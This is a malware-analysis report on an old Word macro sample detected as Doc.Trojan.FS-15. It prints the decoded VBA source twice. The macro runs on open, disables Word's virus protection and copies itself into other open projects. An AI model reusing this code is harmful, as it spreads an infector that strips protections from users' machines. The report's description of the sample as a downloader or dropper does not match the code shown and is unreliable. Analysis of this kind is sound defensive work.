Office (OLE) malware analysis — malicious · 198e33bbdba38334

MALICIOUS

Office (OLE)

26.0 KB Created: 1999-07-17 18:46:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 9bcfe2c4044c8c96de8d8cc538cddd8d SHA-1: fa872558ae594a62b133395fa284ea950f49309b SHA-256: 198e33bbdba38334f976dd57fad92c6eb6c37d28db11617a8961a55ca357c998

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a Microsoft Word document containing a VBA macro. The macro is triggered by the Document_Open event and attempts to obfuscate its own code by deleting and rewriting its contents. This behavior is indicative of a downloader or dropper mechanism, though the specific payload is not discernible from the provided evidence. The macro's self-modification suggests an attempt to evade static analysis.

Heuristics 3

ClamAV: Doc.Trojan.FS-15 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.FS-15
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 834 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	834 bytes
SHA-256: `8bc1e80db5bc421f8438b1de9024817fd5061043320cde326b3077d4f78800cf`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Copyright (C) 1998 by FlyShadow ~^^~ - Shove Private Sub Document_Open() On Error Resume Next Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 Application.EnableCancelKey = 0 With ThisDocument.VBProject.VBComponents(1).CodeModule ι = .Lines(1, .CountOfLines) .DeleteLines 1, .CountOfLines: End With �: Set α = VBE.VBProjects(Int(Rnd() * VBE.VBProjects.Count + 1)) If α.Protection <> 1 Then With α.VBComponents(1).CodeModule .DeleteLines 1, .CountOfLines: .AddFromString ι Exit Sub: End With: End If: GoTo � End Sub

SHA-256: 8bc1e80db5bc421f8438b1de9024817fd5061043320cde326b3077d4f78800cf

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Shove
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.EnableCancelKey = 0
With ThisDocument.VBProject.VBComponents(1).CodeModule
ι = .Lines(1, .CountOfLines)
.DeleteLines 1, .CountOfLines: End With
�: Set α = VBE.VBProjects(Int(Rnd() * VBE.VBProjects.Count + 1))
If α.Protection <> 1 Then
With α.VBComponents(1).CodeModule
.DeleteLines 1, .CountOfLines: .AddFromString ι
Exit Sub: End With: End If: GoTo �
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.